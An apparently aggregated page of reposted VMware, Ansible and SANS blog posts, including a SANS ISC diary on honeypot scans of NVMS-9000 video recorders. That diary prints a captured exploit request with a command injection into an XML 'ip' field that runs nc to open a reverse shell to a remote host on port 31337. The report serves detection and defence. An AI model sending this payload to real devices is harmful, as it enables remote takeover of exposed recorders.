All posts by David

Schedule These Can’t-Miss VMworld 2019 Europe Sessions!

This post was originally published on this site

VMworld 2019 Europe is rapidly approaching, and with over 600 intriguing sessions to choose from, to say we are excited is as big an understatement as saying La Sagrada Familia is an interesting building. But, with so much choice, scheduling can get a little confusing. That’s why we’re highlighting several “can’t miss” sessions that address […]

The post Schedule These Can’t-Miss VMworld 2019 Europe Sessions! appeared first on VMware End-User Computing Blog.

Spousetivities in Barcelona at VMworld EMEA 2019

This post was originally published on this site

Barcelona is probably my favorite city in Europe—which works out well, since VMware seems to have settled on Barcelona at the destination for VMworld EMEA. VMworld is back in Barcelona again this year, and I’m fortunate enough to be able to attend. VMworld in Barcelona wouldn’t be the same without Spousetivities, though, and I’m happy to report that Spousetivities will be in Barcelona. In fact, registration is already open!

If you’re bringing along a spouse, significant other, boyfriend/girlfriend, or just some family members, you owe it to them to look into Spousetivities. You’ll be able to focus at the conference knowing that your loved one(s) are not only safe, but enjoying some amazing activities in and around Barcelona. Here’s a quick peek at what Crystal and her team have lined up this year:

  • A wine tour of the Penedes region (southwest of Barcelona)—attendees will get to see some amazing wineries not frequented by tourists!
  • A walking tour of Barcelona
  • A tapas cooking class
  • A fantastic walking tour of Costa Brava, Pals, and Girona
  • A sailing tour (it’s a 3 hour tour, but it won’t end up like Gilligan’s)

Lunch and private transportation are included for all activities, and all activities will depart from the conference center. Times are listed on the registration site.

It’s worth noting—even though I’ve said it before—that these activities are not your run-of-the-mill tourist activities. These are custom activities not available to the general public, specially arranged for Spousetivities participants.

Prices for all these activities are reduced thanks to Veeam’s sponsorship, and to help make things even more affordable there is a Full Week Pass that gives you access to all the activities at an additional discount. I’d like to personally thank Veeam for their continued support—I believe work/life balance is an important defense against burnout, and it’s great to see a company letting their actions demonstrate their support of work/life balance (instead of just empty corporate statements).

These activities will almost certainly sell out, so register today!

(BTW, for all things Spousetivities-related, be sure to check out the newly-updated Spousetivities web site.)

Scanning Activity for NVMS-9000 Digital Video Recorder, (Sun, Oct 20th)

This post was originally published on this site

Since the beginning of October, my honeypot has been capturing numerous scans for DVR model NVMS-9000 which a PoC was released last year describing a “Stack Overflow in Base64 Authorization”[1].

DVR Activity NVMS-9000

The traffic captured by my honeypot matches the PoC with the same Base 64 username and password (admin:{12213BD1-69C7-4862-843D-260500D1DA40}) attempting to fork a reverse shell to redirect the traffic to a remote listener on port TCP 31337. The vendor advisory is posted here where they indicated a firmware update is available.

Here is an example of traffic you could expect to see in your logs:

20191020-025738: 192.168.25.9:80-84.150.176.93:34656 data ‘POST /editBlackAndWhiteList HTTP/1.1rnAccept-Encoding: identityrnContent-Length: 586rnAccept-Language: en-usrnHost: XX.71.48.119rnAccept: */*rnUser-Agent: ApiToolrnConnection: closernCache-Control: max-age=0rnContent-Type: text/xmlrnAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=rnrn<?xml version=”1.0″ encoding=”utf-8″?><request version=”1.0″ systemType=”NVMS-9000” clientType=”WEB”><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=”filterTypeMode”>refuse</filterType><filterList type=”list”><itemType><addressType type=”addressType”/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}XX.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>’

[1] https://raw.githubusercontent.com/mcw0/PoC/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
[2] http://en.tvt.net.cn/news/227.html
[3] https://manualzz.com/doc/9541049/cms-nvms-9000-presentation

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ESXi host connectivity with vCenter Server

This post was originally published on this site

Reading Time: 3 minutes One interesting news of the latest version of vCSA is the health monitoring feature. You can check the overlall health with your vSphere Client, by selecting the vCenter node and then Monitor | Health. As explained in this blog post, vSphere Health works to identify and resolve potential issues before they have an impact on a customer’s environment and contains more than 30 different health checks that can be run against a vSphere environment. Usually it checks for bad drivers, CPU bugs, know problems. But it also make some tests to check some services or […]

The post ESXi host connectivity with vCenter Server appeared first on vInfrastructure Blog.

VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots

This post was originally published on this site

VMware vRealize LifeCycle Manager 8 released earlier this week, 17th October 2019. Note the official name and abbreviation, its a long one! vRSLCM (vRealize Suite LifeCycle Manager) You can find the supporting official documentation here; What’s New Blog Link: What’s New Blog Post Download Link: Product Download Release Notes: Release Notes Documentation Link: Resources Migration … Continue reading VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots

The post VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots appeared first on @Saintdle.

VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots

This post was originally published on this site

VMware vRealize LifeCycle Manager 8 released earlier this week, 17th October 2019. Note the official name and abbreviation, its a long one! vRSLCM (vRealize Suite LifeCycle Manager) You can find the supporting official documentation here; What’s New Blog Link: What’s New Blog Post Download Link: Product Download Release Notes: Release Notes Documentation Link: Resources Migration … Continue reading VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots

The post VMware vRealize LifeCycle Manager 8 – Migration Process Screenshots appeared first on @Saintdle.

Automate Like A Service Provider With vRealize Automation – Part II

This post was originally published on this site

In my previous post, we discussed adding automation and self-service provisioning to your existing IT services. In this blog post, I’ll share some suggestions to help make it a reality.   Mature the delivery of IT services Step 1: Identify the Service Analyze your ticketing system and determine which requests for IT services are fairly

The post Automate Like A Service Provider With vRealize Automation – Part II appeared first on VMware Cloud Management.

What Assumptions Are You Making?, (Sat, Oct 19th)

This post was originally published on this site

If my security agents were not working correctly, then I would get an alert. Since no one said there is a problem with my security agents, then everything must be ok with them. These are just a couple of the assumptions that we make as cybersecurity practitioners each day about the security agents that serve to protect our respective organizations. While it is preferable to think that everything is ok, it is much better to validate that assumption regularly. 

I have been fortunate to work in cybersecurity for many years and at several diverse types of organizations. During that time, I always found it helpful to check on the status of the security agents periodically. I have found that by scheduling regular and recurring calendar reminders, I can better validate the assumption that the security agents are working as intended. Specific areas of focus include both confirming the security agent is installed correctly and that it is performing the actions specified in the policy. 

Central monitoring consoles are a great place to start for security agents that have not communicated back to the console within an acceptable time. The output from the console can be compared to the Inventory and Control of Hardware Assets to ensure that every system has a security agent installed. Whether an automated or manual task, this practical step can help to validate that assumption. 

What assumptions can you validate today? Think about that over the weekend and determine to take action on Monday morning! By being intentional to validate the health of your security agents, you can do a great deal to validate the assumptions you are making.

How to a how long can you stand not to know when your security agents are not working as expected? Let us know of your successes in the comments section below!

 

Russell Eubanks

ISC Handler

@russelleubanks

10 Visibility Gaps Every CISO Must Fill

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

How to install Ansible on Linux for vSphere configuration

This post was originally published on this site

managing-Vmware-vSphere-through-Ansible-devops-automation-tool-api-pyvmomi-780x405.png

Recently I took over a task to evaluate few DevOps configuration, automation and orchestration tools to configure VMware vSphere. There are many tools available in the market for DevOps automation. Personally I like and already worked on PowerCLI DSC earlier and have great expertise. Still I preferred Ansible since I have expertise on the same tool since great community support. Plus my entire team was using Ansible for other product configuration management and they had good hands on experience. Ansible server is called controller. This software is only installed on Linux OS. No software for windows. Here I am using CentOS version 7 to install Ansible. Installation is very straight just going through below commands. First i will prepare OS and update all the packages on Linux by running.

sudo yum update -y

Note: My linux server – Ansible controller has direct access to internet and all the packages are getting installed from online CentOS repository.

Install-ansible-on-linux-ubuntu-redhat-centos-sudo-yum-update-packages-base-extras-updates-base-no-packages-marked-for-update-pyvmomi-ansible-devops-automation.png

I will be Installing Ansible using python PIP. Below command installs python-setuptools. Why I am using pip here when yum can do the same task? I want Ansible and all the required modules to be of same version to avoid any dependencies or conflict. Differences in Ansible and module version might cause issues. PIP will give uniformity.

sudo yum install python-setuptools -y
sudo-yum-install-python-setuptools-Install-ansible-using-python-pip-on-linux-centos-for-pyvmomi-vmware-vsphere-automation-devops.png

This command installs PIP. PIP is a package manager for Python packages, or modules if you like.

sudo easy_install pip

sudo-easy_install-pip-python-modules-pyvmomi-automation-ansible-installation-module-automation-devops.png

This will install actual Ansible controller software, alternative to pip command is sudo yum install ansible.

sudo pip install ansible 

sudo-pip-install-ansible-devops-automation-tool-vsphere-vcenter-esxi-module-pyvmomi-python-module.png

This is last step and shows how to install Ansible module pyvmomi for vSphere. Same step you can use to install any other modules.

sudo pip install pyvmomi

sudo-pip-install-pyvmomi-python-ansible-module-for-automation-devops-vsphere-ansible-automation-testing.png

Everything is installed correctly till now. Its time to test Ansible, which I will test using ping module against localhost. I am getting success message with all green color messages after execution and response to ping is pong. In next article I will use it to configure Esxi servers.

ansible localhost -m ping

vmware-vsphere-ansible-localhost-module-pyvmomi-ping-test-ping-pong-success-devops-automation-ansible-declarative.png

This is first part of installing Ansible and Pyvyomi module for vSphere is done, In next parts I will take work on configuring vSphere.

Useful Article
PART 1 : BUILDING AND BUYING GUIDE IDEAS FOR VMWARE LAB
PART 2 : BUILDING AND HARDWARE BUYING GUIDE IDEAS FOR VMWARE LAB
PART 3 : MY VSPHERE LAB CONFIGURATION ON VMWARE WORKSTATION
PART 4 : CONFIGURING VMWARE WORKSTATION NETWORKING IN HOME LAB
PART 5 : CONFIGURING STORAGE IN VMWare WORKSTATION FOR OPTIMAL SPEED
PART 6 : CONFIGURE VMWARE WORKSTATION TO SAVE SSD SPACE AND TIME
PART 7 : CREATING NESTED VMWARE ESXI SERVER VM IN HOMELAB ON VMWARE WORKSTATION
PART 8 : CPU COOLING SOLUTION FOR MY HOME LAB ON VMWARE WORKSTATION

Special Webcast: SANS Cloud Security Operations Solutions Forum – October 18, 2019 8:30am US/Pacific

This post was originally published on this site

Speakers: Kenneth Hartman

{{!In the Seattle area? Join us at the Live Event. Register here: Link}}

All organizations must protect their confidential information. After all, it is this information that gives the organization its competitive value and enables it to achieve its mission. Security operations (SecOps) is focused on the day-to-day tasks necessary to protect the confidentiality, integrity, and availability of the organization’s data and the systems that process it. Moving this data to the cloud certainly brings creates some SecOps challenges. What works on-premise may not work effectively in the cloud and might not scale well.

Concerns about the trustworthiness of the cloud are the most significant barrier to cloud adoption. Knowing these apprehensions, Cloud Service Providers (CSP) and other solution providers are tackling this challenge head-on and have created innovative solutions to help cloud customers secure the data they process in the cloud. Cloud-native technical security controls that leverage application programming interfaces (API) and the software-defined aspects of cloud services enable customers to lock down their environments in ways that are not possible on-premise. These capabilities have caused some to argue that a properly configured cloud environment may be more secure.

The challenge with so much innovation and so many choices is that customers can get overwhelmed with all the hype in the marketplace. The SANS Cloud Security Operations Solutions Forum will focus on cloud security operations solutions that work, with a focus on providing specific technical advice directly from the vendor support engineers working in the field.

Earn 4 CPE Credit hours for attending this event.

Agenda: TBD

Speakers:

Kenneth Hartman

Kenneth G. Hartman is a security engineering leader in Silicon Valley. Ken’s motto is “I help my company earn and maintain the trust of our customers in our products and services.” Toward this end, Ken drives a comprehensive program portfolio of technical security initiatives focused on securing customers’ data in the AWS Cloud. Ken has worked for a variety of Cloud Service Providers in Architecture, Engineering, Compliance, and Security Product Management roles. From 2002-2011, Ken helped launch and lead a company called Visonex into a profitable, nation-wide dialysis-specific electronic medical record using a software-as-a-service (SaaS) business model. Ken holds a BS Electrical Engineering from Michigan Technological University and a Masters Degree in Information Security Engineering from SANS Technology Institute. Ken has earned the CISSP, as well as multiple GIAC security certifications, including the GIAC Security Expert. Ken is also a Licensed PI in Michigan as required by law to consult on criminal cases involving digital forensics.